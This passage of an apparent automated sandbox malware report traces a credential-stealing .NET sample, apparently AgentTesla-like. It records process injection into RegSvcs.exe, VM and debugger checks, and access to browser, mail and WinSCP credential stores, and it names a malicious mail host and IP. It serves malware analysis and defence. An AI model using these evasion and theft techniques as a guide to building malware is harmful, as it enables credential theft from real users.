                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599181Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599063Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99503Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99375Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99266Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99141Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 99032Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98907Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98797Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98688Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98563Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 98438Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597313Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597188Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597078Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595985Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595094Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594969Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594860Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594735Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594610Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594485Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594360Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594235Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594110Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 593985Jump to behavior
                      Source: RegSvcs.exe, 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: vmware
                      Source: RegSvcs.exe, 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                      Source: RegSvcs.exe, 00000004.00000002.4634567726.0000000006642000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

                      Anti Debugging

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_02F97EC8 CheckRemoteDebuggerPresent,4_2_02F97EC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1175008Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.4630422433.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4630422433.0000000003205000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4630422433.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe PID: 5448, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4868, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4630422433.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe PID: 5448, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4868, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.48c3350.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.4846130.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe.47c8f10.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.4630422433.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4630422433.0000000003205000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.4630422433.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe PID: 5448, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4868, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      311
                      Process Injection
                      1
                      Masquerading
                      1
                      OS Credential Dumping
                      421
                      Security Software Discovery
                      Remote Services1
                      Email Collection
                      11
                      Encrypted Channel
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      Input Capture
                      151
                      Virtualization/Sandbox Evasion
                      Remote Desktop Protocol1
                      Input Capture
                      1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)151
                      Virtualization/Sandbox Evasion
                      1
                      Credentials in Registry
                      1
                      Application Window Discovery
                      SMB/Windows Admin Shares11
                      Archive Collected Data
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                      Process Injection
                      NTDS1
                      System Network Configuration Discovery
                      Distributed Component Object Model1
                      Data from Local System
                      13
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets1
                      File and Directory Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                      Obfuscated Files or Information
                      Cached Domain Credentials24
                      System Information Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                      Software Packing
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      DLL Side-Loading
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe34%ReversingLabsByteCode-MSIL.Trojan.Barys
                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe34%VirustotalBrowse
                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe100%AviraHEUR/AGEN.1308740
                      SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe100%Joe Sandbox ML
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      mail.nationalkham.com0%VirustotalBrowse
                      SourceDetectionScannerLabelLink
                      http://mail.nationalkham.com0%VirustotalBrowse
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      mail.nationalkham.com
                      192.185.35.67
                      truetrueunknown
                      api.ipify.org
                      104.26.12.205
                      truefalse
                        high
                        ip-api.com
                        208.95.112.1
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            high
                            http://ip-api.com/line/?fields=hostingfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              https://api.ipify.orgSecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4630422433.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.ctvnews.ca/rss/business/ctv-news-business-headlines-1.867648SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exefalse
                                  high
                                  https://account.dyn.com/SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe, 00000000.00000002.2184032551.00000000045BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.4628687472.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                    high
                                    http://www.ctvnews.ca/rss/ctvnews-ca-top-stories-public-rss-1.822009SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exefalse
                                      high
                                      http://xml.weather.yahoo.com/ns/rss/1.0SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exefalse
                                        high
                                        https://api.ipify.org/tRegSvcs.exe, 00000004.00000002.4630422433.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000004.00000002.4630422433.0000000003171000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://mail.nationalkham.comRegSvcs.exe, 00000004.00000002.4630422433.00000000031FD000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                                            http://weather.yahooapis.com/forecastrss?w=4118SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exefalse
                                              high
                                              http://ip-api.comRegSvcs.exe, 00000004.00000002.4630422433.00000000031C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                208.95.112.1
                                                ip-api.comUnited States
                                                53334TUT-ASUSfalse
                                                104.26.12.205
                                                api.ipify.orgUnited States
                                                13335CLOUDFLARENETUSfalse
                                                192.185.35.67
                                                mail.nationalkham.comUnited States
                                                46606UNIFIEDLAYER-AS-1UStrue
                                                Joe Sandbox version:40.0.0 Tourmaline
                                                Analysis ID:1427766
                                                Start date and time:2024-04-18 06:24:10 +02:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 9m 32s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Number of analysed new started processes analysed:10
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe
                                                Detection:MAL
                                                Classification:mal100.troj.spyw.evad.winEXE@3/1@3/3
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:
                                                • Successful, ratio: 99%
                                                • Number of executed functions: 236
                                                • Number of non-executed functions: 14
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                TimeTypeDescription
                                                06:25:16API Interceptor1x Sleep call for process: SecuriteInfo.com.Win32.PWSX-gen.27467.16755.exe modified
                                                06:25:18API Interceptor11407776x Sleep call for process: RegSvcs.exe modified
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                208.95.112.1Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • ip-api.com/line/?fields=hosting
                                                PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                • ip-api.com/line/?fields=hosting
                                                PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                • ip-api.com/line/?fields=hosting
                                                dgxK76VlXC.exeGet hashmaliciousAsyncRAT, StormKitty, SugarDump, VenomRAT, XWorm, XenoRATBrowse
                                                • ip-api.com/line/?fields=hosting
                                                cByN4LhaIc.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • ip-api.com/line/?fields=hosting
                                                yiOV58jIWd.exeGet hashmaliciousXWormBrowse
                                                • ip-api.com/line/?fields=hosting
                                                104.26.12.205Sky-Beta.exeGet hashmaliciousStealitBrowse
                                                • api.ipify.org/?format=json
                                                SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                                • api.ipify.org/
                                                lods.cmdGet hashmaliciousRemcosBrowse
                                                • api.ipify.org/
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                ip-api.comFizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                Cintillo 2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                comprobante.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                RFQ-DOC#GMG7278726655738_PM62753_Y82629_xcod.0.GZGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                • 208.95.112.1
                                                QUOTATION-#170424.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                dekont.pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                • 208.95.112.1
                                                PO JSC_109117.exeGet hashmaliciousAgentTeslaBrowse
                                                • 208.95.112.1
                                                PURCHASE ORDER LISTS GREEN VALLY CORP.batGet hashmaliciousGuLoaderBrowse
                                                • 208.95.112.1
                                                dgxK76VlXC.exeGet hashmaliciousAsyncRAT, StormKitty, SugarDump, VenomRAT, XWorm, XenoRATBrowse
                                                • 208.95.112.1
                                                cByN4LhaIc.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                • 208.95.112.1
                                                api.ipify.orgSecuriteInfo.com.Win32.MalwareX-gen.3610.30636.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.13.205
                                                invoice & packing list.exeGet hashmaliciousAgentTeslaBrowse
                                                • 172.67.74.152
                                                ZG17uv37pi.exeGet hashmaliciousUnknownBrowse
                                                • 104.26.13.205
                                                ZG17uv37pi.exeGet hashmaliciousUnknownBrowse
                                                • 172.67.74.152
                                                Fizetes,jpg.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.12.205
                                                SecuriteInfo.com.FileRepMalware.7644.21541.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.13.205
                                                payload.jsGet hashmaliciousUnknownBrowse
                                                • 104.26.13.205
                                                payload.jsGet hashmaliciousUnknownBrowse
                                                • 172.67.74.152
                                                Payment Advice.exeGet hashmaliciousAgentTeslaBrowse
                                                • 104.26.13.205
